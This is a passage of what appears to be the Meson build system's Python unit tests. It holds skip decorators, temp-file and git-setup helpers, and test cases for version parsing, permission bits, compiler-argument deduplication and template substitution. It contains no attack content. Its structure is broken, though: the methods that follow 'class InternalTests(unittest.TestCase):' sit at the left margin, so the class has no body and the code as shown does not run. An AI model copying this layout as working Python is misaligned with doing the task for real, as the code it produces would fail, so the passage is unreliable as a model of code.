    raw = get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
    if not raw:
        # covers both '' and None
        return None
    # nix/nixos adds a bunch of stuff to the rpath out of necessity that we
    # don't check for, so clear those
    kept = [component for component in raw.split(':')
            if not component.startswith('/nix')]
    return ':'.join(kept)
def is_tarball():
    """Return True when running from a release tarball (which, unlike a git
    checkout, does not ship the docs/ directory)."""
    return not os.path.isdir('docs')
def is_ci():
    """Return True when running under CI (the CI environment variable is set)."""
    return 'CI' in os.environ
def _git_init(project_dir):
    """Initialise *project_dir* as a git repo with a dummy identity and an
    initial commit of all files."""
    # If a user has git configuration init.defaultBranch set we want to override that
    with tempfile.TemporaryDirectory() as d:
        out = git(['--version'], str(d))[1]
        # --initial-branch only exists since git 2.28
        if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'):
            extra_cmd = ['--initial-branch', 'master']
        else:
            extra_cmd = []
    subprocess.check_call(['git', 'init'] + extra_cmd, cwd=project_dir, stdout=subprocess.DEVNULL)
    # dummy identity so `git commit` works on machines with no git config
    subprocess.check_call(['git', 'config',
                           'user.name', 'Author Person'], cwd=project_dir)
    subprocess.check_call(['git', 'config',
                           'user.email', 'teh_coderz@example.com'], cwd=project_dir)
    _git_add_all(project_dir)
def _git_add_all(project_dir):
    """Stage every file in *project_dir* and commit it."""
    # shell=True so the shell expands '*'; project_dir content is test-controlled
    subprocess.check_call('git add *', cwd=project_dir, shell=True,
                          stdout=subprocess.DEVNULL)
    subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
                          stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
    '''
    Check if the gcc we have is a real gcc and not a macOS wrapper around clang
    (cached per path, since invoking the compiler is slow).
    '''
    if not path:
        return False
    version_text = subprocess.check_output([path, '--version'],
                                           universal_newlines=True,
                                           stderr=subprocess.STDOUT)
    return 'Free Software Foundation' in version_text
def skipIfNoExecutable(exename):
    '''
    Skip this test if the given executable is not found.
    '''
    def decorator(f):
        @functools.wraps(f)
        def inner(*args, **kwargs):
            # look up lazily, at test run time, so PATH changes are honoured
            if shutil.which(exename) is None:
                raise unittest.SkipTest(exename + ' not found')
            return f(*args, **kwargs)
        return inner
    return decorator
def skipIfNoPkgconfig(f):
    '''
    Skip this test if no pkg-config is found, unless we're on CI.
    This allows users to run our test suite without having
    pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
    silently skip the test because of misconfiguration.
    Note: Yes, we provide pkg-config even while running Windows CI
    '''
    @functools.wraps(f)
    def inner(*args, **kwargs):
        # on CI, a missing pkg-config is a configuration error, not a skip
        if not is_ci() and shutil.which('pkg-config') is None:
            raise unittest.SkipTest('pkg-config not found')
        return f(*args, **kwargs)
    return inner
def skipIfNoPkgconfigDep(depname):
    '''
    Skip this test if the given pkg-config dep is not found, unless we're on CI
    (where a missing dependency is a misconfiguration, not a skip).
    '''
    def decorator(f):
        @functools.wraps(f)
        def inner(*args, **kwargs):
            if not is_ci() and shutil.which('pkg-config') is None:
                raise unittest.SkipTest('pkg-config not found')
            if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
                raise unittest.SkipTest(f'pkg-config dependency {depname} not found.')
            return f(*args, **kwargs)
        return inner
    return decorator
def skip_if_no_cmake(f):
    '''
    Skip this test if no cmake is found, unless we're on CI.
    This allows users to run our test suite without having
    cmake installed on, f.ex., macOS, while ensuring that our CI does not
    silently skip the test because of misconfiguration.
    '''
    @functools.wraps(f)
    def inner(*args, **kwargs):
        if not is_ci() and shutil.which('cmake') is None:
            raise unittest.SkipTest('cmake not found')
        return f(*args, **kwargs)
    return inner
def skip_if_not_language(lang):
    '''
    Skip the test when no compiler for *lang* can be detected on the host.
    '''
    def decorator(func):
        @functools.wraps(func)
        def inner(*args, **kwargs):
            try:
                env = get_fake_env()
                detect = getattr(env, f'detect_{lang}_compiler')
                detect(MachineChoice.HOST)
            except EnvironmentException:
                raise unittest.SkipTest(f'No {lang} compiler found.')
            return func(*args, **kwargs)
        return inner
    return decorator
def skip_if_env_set(key):
    '''
    Skip a test if a particular env is set, except when running under CI,
    where the variable is instead hidden for the duration of the test.
    '''
    def decorator(func):
        @functools.wraps(func)
        def inner(*args, **kwargs):
            saved = None
            if key in os.environ:
                if not is_ci():
                    raise unittest.SkipTest(f'Env var {key!r} set, skipping')
                # on CI: temporarily remove the variable instead of skipping
                saved = os.environ.pop(key)
            try:
                return func(*args, **kwargs)
            finally:
                if saved is not None:
                    os.environ[key] = saved
        return inner
    return decorator
def skip_if_not_base_option(feature):
    """Skip tests if the compiler does not support a given base option.

    For example, ICC doesn't currently support b_sanitize.
    """
    def decorator(f):
        @functools.wraps(f)
        def inner(*args, **kwargs):
            env = get_fake_env()
            cc = env.detect_c_compiler(MachineChoice.HOST)
            if OptionKey(feature) not in cc.base_options:
                raise unittest.SkipTest(f'{feature} not available with {cc.id}')
            return f(*args, **kwargs)
        return inner
    return decorator
@contextmanager
def temp_filename():
    '''A context manager which provides a filename to an empty temporary file.
    On exit the file will be deleted (a file already removed by the caller is
    silently ignored).
    '''
    handle, name = tempfile.mkstemp()
    # close immediately: callers only want the path, not the descriptor
    os.close(handle)
    try:
        yield name
    finally:
        try:
            os.remove(name)
        except OSError:
            pass
@contextmanager
def no_pkgconfig():
    '''
    A context manager that overrides shutil.which and ExternalProgram to force
    them to return None for pkg-config to simulate it not existing.

    Restores both globals on exit, even on exceptions.  Not thread-safe:
    it mutates module-level state.
    '''
    old_which = shutil.which
    old_search = ExternalProgram._search
    def new_search(self, name, search_dir):
        if name == 'pkg-config':
            return [None]
        return old_search(self, name, search_dir)
    # NOTE(review): the parameter is spelled *kwargs but collects positional
    # args (shutil.which(cmd, mode, path)) — works, but the name is misleading.
    def new_which(cmd, *kwargs):
        if cmd == 'pkg-config':
            return None
        return old_which(cmd, *kwargs)
    shutil.which = new_which
    ExternalProgram._search = new_search
    try:
        yield
    finally:
        shutil.which = old_which
        ExternalProgram._search = old_search
class InternalTests(unittest.TestCase):
def test_version_number(self):
    """search_version() must extract the dotted version from arbitrary text."""
    searchfunc = mesonbuild.environment.search_version
    expectations = [
        ('foobar 1.2.3', '1.2.3'),
        ('1.2.3', '1.2.3'),
        ('foobar 2016.10.28 1.2.3', '1.2.3'),
        ('2016.10.28 1.2.3', '1.2.3'),
        ('foobar 2016.10.128', '2016.10.128'),
        ('2016.10.128', '2016.10.128'),
        ('2016.10', '2016.10'),
        ('2016.10 1.2.3', '1.2.3'),
        ('oops v1.2.3', '1.2.3'),
        ('2016.oops 1.2.3', '1.2.3'),
        ('2016.x', 'unknown version'),
    ]
    for text, expected in expectations:
        self.assertEqual(searchfunc(text), expected)
def test_mode_symbolic_to_bits(self):
    """perms_s_to_bits() must map ls-style permission strings to stat bits."""
    modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
    cases = [
        ('---------', 0),
        ('r--------', stat.S_IRUSR),
        ('---r-----', stat.S_IRGRP),
        ('------r--', stat.S_IROTH),
        ('-w-------', stat.S_IWUSR),
        ('----w----', stat.S_IWGRP),
        ('-------w-', stat.S_IWOTH),
        ('--x------', stat.S_IXUSR),
        ('-----x---', stat.S_IXGRP),
        ('--------x', stat.S_IXOTH),
        ('--S------', stat.S_ISUID),
        ('-----S---', stat.S_ISGID),
        ('--------T', stat.S_ISVTX),
        ('--s------', stat.S_ISUID | stat.S_IXUSR),
        ('-----s---', stat.S_ISGID | stat.S_IXGRP),
        ('--------t', stat.S_ISVTX | stat.S_IXOTH),
        ('rwx------', stat.S_IRWXU),
        ('---rwx---', stat.S_IRWXG),
        ('------rwx', stat.S_IRWXO),
        # We could keep listing combinations exhaustively but that seems
        # tedious and pointless. Just test a few more.
        ('rwxr-xr-x',
         stat.S_IRWXU |
         stat.S_IRGRP | stat.S_IXGRP |
         stat.S_IROTH | stat.S_IXOTH),
        ('rw-r--r--',
         stat.S_IRUSR | stat.S_IWUSR |
         stat.S_IRGRP |
         stat.S_IROTH),
        ('rwsr-x---',
         stat.S_IRWXU | stat.S_ISUID |
         stat.S_IRGRP | stat.S_IXGRP),
    ]
    for perms, expected in cases:
        self.assertEqual(modefunc(perms), expected)
def test_compiler_args_class_none_flush(self):
    """CompilerArgs must not flush its pending pre/post containers too early
    when arguments are added via += (deduplication order is significant)."""
    cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock())
    a = cc.compiler_args(['-I.'])
    #first we are checking if the tree construction deduplicates the correct -I argument
    a += ['-I..']
    a += ['-I./tests/']
    a += ['-I./tests2/']
    #think this here as assertion, we cannot apply it, otherwise the CompilerArgs would already flush the changes:
    # assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.'])
    a += ['-I.']
    a += ['-I.', '-I./tests/']
    self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..'])
    #then we are checking that when CompilerArgs already have a build container list, that the deduplication is taking the correct one
    a += ['-I.', '-I./tests2/']
    self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..'])
def test_compiler_args_class_d(self):
    """D (DMD) compiler args: deduplication must preserve include order."""
    dmd = mesonbuild.compilers.DmdDCompiler([], 'fake', MachineChoice.HOST, 'info', 'arch')
    args = dmd.compiler_args(['-Ifirst', '-Isecond', '-Ithird'])
    # Re-adding an include that is already present must not reorder anything.
    args += ['-Ifirst']
    self.assertEqual(args, ['-Ifirst', '-Isecond', '-Ithird'])
def test_compiler_args_class_clike(self):
    """Exercise CompilerArgs list semantics for a C-like (clang) compiler:
    construction, append/`+=`/`+`/reflected-`+`, removal, deduplication of
    -I/-l/-L style args, and the `_direct` variants that bypass dedup."""
    cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock())
    # Test that empty initialization works
    a = cc.compiler_args()
    self.assertEqual(a, [])
    # Test that list initialization works
    a = cc.compiler_args(['-I.', '-I..'])
    self.assertEqual(a, ['-I.', '-I..'])
    # Test that there is no de-dup on initialization
    self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.'])
    ## Test that appending works
    a.append('-I..')
    self.assertEqual(a, ['-I..', '-I.'])
    a.append('-O3')
    self.assertEqual(a, ['-I..', '-I.', '-O3'])
    ## Test that in-place addition works
    a += ['-O2', '-O2']
    self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
    # Test that removal works
    a.remove('-O2')
    self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
    # Test that de-dup happens on addition
    a += ['-Ifoo', '-Ifoo']
    self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
    # .extend() is just +=, so we don't test it
    ## Test that addition works
    # Test that adding a list with just one old arg works and yields the same array
    a = a + ['-Ifoo']
    self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
    # Test that adding a list with one arg new and one old works
    a = a + ['-Ifoo', '-Ibaz']
    self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
    # Test that adding args that must be prepended and appended works
    a = a + ['-Ibar', '-Wall']
    self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
    ## Test that reflected addition works
    # Test that adding to a list with just one old arg works and yields the same array
    a = ['-Ifoo'] + a
    self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
    # Test that adding to a list with just one new arg that is not pre-pended works
    a = ['-Werror'] + a
    self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
    # Test that adding to a list with two new args preserves the order
    a = ['-Ldir', '-Lbah'] + a
    self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
    # Test that adding to a list with old args does nothing
    a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
    self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
    ## Test that adding libraries works
    l = cc.compiler_args(['-Lfoodir', '-lfoo'])
    self.assertEqual(l, ['-Lfoodir', '-lfoo'])
    # Adding a library and a libpath appends both correctly
    l += ['-Lbardir', '-lbar']
    self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
    # Adding the same library again does nothing
    l += ['-lbar']
    self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
    ## Test that 'direct' append and extend works
    l = cc.compiler_args(['-Lfoodir', '-lfoo'])
    self.assertEqual(l, ['-Lfoodir', '-lfoo'])
    # Direct-adding a library and a libpath appends both correctly
    l.extend_direct(['-Lbardir', '-lbar'])
    self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
    # Direct-adding the same library again still adds it
    l.append_direct('-lbar')
    self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
    # Direct-adding with absolute path deduplicates
    l.append_direct('/libbaz.a')
    self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
    # Adding libbaz again does nothing
    l.append_direct('/libbaz.a')
    self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
    """Check that to_native() wraps library arguments (including -Wl,-l*)
    in -Wl,--start-group/--end-group for a GNU BFD linker, while
    non-library args stay outside the group."""
    ## Test --start/end-group
    linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
    gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
    ## Ensure that the fake compiler is never called by overriding the relevant function
    gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
    ## Test that 'direct' append and extend works
    l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
    self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
    # Direct-adding a library and a libpath appends both correctly
    l.extend_direct(['-Lbardir', '-lbar'])
    self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
    # Direct-adding the same library again still adds it
    l.append_direct('-lbar')
    self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
    # Direct-adding with absolute path deduplicates
    l.append_direct('/libbaz.a')
    self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
    # Adding libbaz again does nothing
    l.append_direct('/libbaz.a')
    self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
    # Adding a non-library argument doesn't include it in the group
    l += ['-Lfoo', '-Wl,--export-dynamic']
    self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
    # -Wl,-lfoo is detected as a library and gets added to the group
    l.append('-Wl,-ldl')
    self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
    """Check that to_native() drops -isystem flags (in all three spellings:
    fused, '=', and separate-argument) that point at the compiler's default
    include dirs, while keeping unrelated args like -D defines."""
    ## Test --start/end-group
    linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
    gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
    ## Ensure that the fake compiler is never called by overriding the relevant function
    gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
    ## Test that 'direct' append and extend works
    l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
    self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
    ## Test that to_native removes all system includes
    l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
    self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
    """Check @INPUT@/@OUTPUT@/@PLAINNAME@/@BASENAME@/@OUTDIR@ template
    dictionary construction and command-line substitution, including the
    error cases (templates not valid for the given input/output counts)."""
    dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
    substfunc = mesonbuild.mesonlib.substitute_values
    ME = mesonbuild.mesonlib.MesonException
    # Identity
    self.assertEqual(dictfunc([], []), {})
    # One input, no outputs
    inputs = ['bar/foo.c.in']
    outputs = []
    ret = dictfunc(inputs, outputs)
    d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
         '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
    # Check dictionary
    self.assertEqual(ret, d)
    # Check substitutions
    cmd = ['some', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), cmd)
    # A single input may be embedded inside another string
    cmd = ['@INPUT@.out', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
    cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
    self.assertEqual(substfunc(cmd, d),
                     [inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
    cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
    self.assertEqual(substfunc(cmd, d),
                     inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
    # No outputs were declared, so @OUTPUT@ must raise
    cmd = ['@OUTPUT@']
    self.assertRaises(ME, substfunc, cmd, d)
    # One input, one output
    inputs = ['bar/foo.c.in']
    outputs = ['out.c']
    ret = dictfunc(inputs, outputs)
    d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
         '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
         '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
    # Check dictionary
    self.assertEqual(ret, d)
    # Check substitutions
    cmd = ['some', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), cmd)
    cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
    self.assertEqual(substfunc(cmd, d),
                     [inputs[0] + '.out'] + outputs + cmd[2:])
    cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
    self.assertEqual(substfunc(cmd, d),
                     [inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
    cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
    self.assertEqual(substfunc(cmd, d),
                     inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
    # One input, one output with a subdir
    outputs = ['dir/out.c']
    ret = dictfunc(inputs, outputs)
    d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
         '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
         '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
    # Check dictionary
    self.assertEqual(ret, d)
    # Two inputs, no outputs
    inputs = ['bar/foo.c.in', 'baz/foo.c.in']
    outputs = []
    ret = dictfunc(inputs, outputs)
    d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
    # Check dictionary
    self.assertEqual(ret, d)
    # Check substitutions
    cmd = ['some', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), cmd)
    cmd = ['@INPUT@', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
    cmd = ['@INPUT0@.out', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
    cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
    self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
    cmd = ['@INPUT0@', '@INPUT1@', 'strings']
    self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
    # Many inputs, can't use @INPUT@ like this
    cmd = ['@INPUT@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Not enough inputs
    cmd = ['@INPUT2@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Too many inputs for @PLAINNAME@/@BASENAME@ to be meaningful
    cmd = ['@PLAINNAME@']
    self.assertRaises(ME, substfunc, cmd, d)
    cmd = ['@BASENAME@']
    self.assertRaises(ME, substfunc, cmd, d)
    # No outputs
    cmd = ['@OUTPUT@']
    self.assertRaises(ME, substfunc, cmd, d)
    cmd = ['@OUTPUT0@']
    self.assertRaises(ME, substfunc, cmd, d)
    cmd = ['@OUTDIR@']
    self.assertRaises(ME, substfunc, cmd, d)
    # Two inputs, one output
    outputs = ['dir/out.c']
    ret = dictfunc(inputs, outputs)
    d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
         '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
    # Check dictionary
    self.assertEqual(ret, d)
    # Check substitutions
    cmd = ['some', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), cmd)
    cmd = ['@OUTPUT@', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
    cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
    cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
    self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
    # Many inputs, can't use @INPUT@ like this
    cmd = ['@INPUT@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Not enough inputs
    cmd = ['@INPUT2@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Not enough outputs
    cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Two inputs, two outputs
    outputs = ['dir/out.c', 'dir/out2.c']
    ret = dictfunc(inputs, outputs)
    d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
         '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
         '@OUTDIR@': 'dir'}
    # Check dictionary
    self.assertEqual(ret, d)
    # Check substitutions
    cmd = ['some', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), cmd)
    cmd = ['@OUTPUT@', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
    cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
    self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
    cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
    self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
    # Many inputs, can't use @INPUT@ like this
    cmd = ['@INPUT@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Not enough inputs
    cmd = ['@INPUT2@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Not enough outputs
    cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Many outputs, can't use @OUTPUT@ like this
    cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
    """Check that the 'needs_exe_wrapper' property in a cross file
    overrides the auto-detected value: first detect without the property,
    then force the opposite value and verify it wins."""
    config = ConfigParser()
    config['binaries'] = {
        'c': '\'/usr/bin/gcc\'',
    }
    config['host_machine'] = {
        'system': '\'linux\'',
        'cpu_family': '\'arm\'',
        'cpu': '\'armv7\'',
        'endian': '\'little\'',
    }
    # Can not be used as context manager because we need to
    # open it a second time and this is not possible on
    # Windows.
    configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
    configfilename = configfile.name
    config.write(configfile)
    configfile.flush()
    configfile.close()
    opts = get_fake_options()
    opts.cross_file = (configfilename,)
    env = get_fake_env(opts=opts)
    detected_value = env.need_exe_wrapper()
    os.unlink(configfilename)
    # Write a second cross file that forces the opposite of the detection.
    desired_value = not detected_value
    config['properties'] = {
        'needs_exe_wrapper': 'true' if desired_value else 'false'
    }
    configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
    configfilename = configfile.name
    config.write(configfile)
    configfile.close()
    opts = get_fake_options()
    opts.cross_file = (configfilename,)
    env = get_fake_env(opts=opts)
    forced_value = env.need_exe_wrapper()
    os.unlink(configfilename)
    self.assertEqual(forced_value, desired_value)
def test_listify(self):
    """listify() wraps scalars in a list, passes lists through, and
    flattens nested lists unless flatten=False is given."""
    listify = mesonbuild.mesonlib.listify
    # Sanity plus flattening, table-driven.
    for expected, arg in [
            ([1], 1),
            ([], []),
            ([1], [1]),
            ([1, 2, 3], [1, [2, 3]]),
            ([1, 2, 3], [1, [2, [3]]]),
    ]:
        self.assertEqual(expected, listify(arg))
    # Nesting must survive when flattening is turned off.
    self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
    # Holder objects are passed through untouched.
    wrapped = ObjectHolder(1)
    self.assertEqual([wrapped], listify(wrapped))
    self.assertEqual([wrapped], listify([wrapped]))
    self.assertEqual([wrapped, 2], listify([wrapped, 2]))
    self.assertEqual([wrapped, 2, 3], listify([wrapped, 2, [3]]))
def test_unholder(self):
    """unholder() unwraps a single holder, or every holder in a list."""
    unholder = mesonbuild.mesonlib.unholder
    one = ObjectHolder(1)
    three = ObjectHolder(3)
    self.assertEqual(1, unholder(one))
    self.assertEqual([1], unholder([one]))
    self.assertEqual([1, 3], unholder([one, three]))
def test_extract_as_list(self):
    """extract_as_list() pulls a kwarg out as a flattened list,
    optionally popping it from the dict."""
    extract = mesonbuild.mesonlib.extract_as_list
    # Test sanity
    kwargs = {'sources': [1, 2, 3]}
    self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
    self.assertEqual(kwargs, {'sources': [1, 2, 3]})
    # pop=True removes the key from the dict as well.
    self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
    self.assertEqual(kwargs, {})
    # Test unholding
    # NOTE(review): holder3 is never passed through extract() below — this
    # looks like a leftover; confirm whether an extract() call went missing.
    holder3 = ObjectHolder(3)
    kwargs = {'sources': [1, 2, holder3]}
    self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
    # flatten nested lists
    kwargs = {'sources': [1, [2, [3]]]}
    self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
    """Check that a pkg-config dependency is rendered as a 'Requires'
    entry (by pcdep name) whether it is added as a public library or as a
    public requirement."""
    dummystate = mock.Mock()
    dummystate.subproject = 'dummy'
    # Mocked ExternalDependency wrapped in a holder, with a pcdep name.
    _mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency)
    _mock.pcdep = mock.Mock()
    _mock.pcdep.name = "some_name"
    _mock.version_reqs = []
    _mock = mock.Mock(held_object=_mock)
    # pkgconfig dependency as lib
    deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
    deps.add_pub_libs([_mock])
    self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
    # pkgconfig dependency as requires
    deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
    deps.add_pub_reqs([_mock])
    self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
    """Helper: verify get_library_naming() returns the expected pattern
    tuples for all LibType values on the given platform, and (openbsd
    only) that versioned .so files are picked by highest valid version."""
    shr = patterns[platform]['shared']
    stc = patterns[platform]['static']
    # PREFER_* orders: preferred kind's patterns first, then the rest.
    shrstc = shr + tuple([x for x in stc if x not in shr])
    stcshr = stc + tuple([x for x in shr if x not in stc])
    p = cc.get_library_naming(env, LibType.SHARED)
    self.assertEqual(p, shr)
    p = cc.get_library_naming(env, LibType.STATIC)
    self.assertEqual(p, stc)
    p = cc.get_library_naming(env, LibType.PREFER_STATIC)
    self.assertEqual(p, stcshr)
    p = cc.get_library_naming(env, LibType.PREFER_SHARED)
    self.assertEqual(p, shrstc)
    # Test find library by mocking up openbsd
    if platform != 'openbsd':
        return
    # Create a mix of validly- and invalidly-versioned .so files; the
    # highest numerically-valid version (54.0) must win.
    with tempfile.TemporaryDirectory() as tmpdir:
        with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
            f.write('')
        with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
            f.write('')
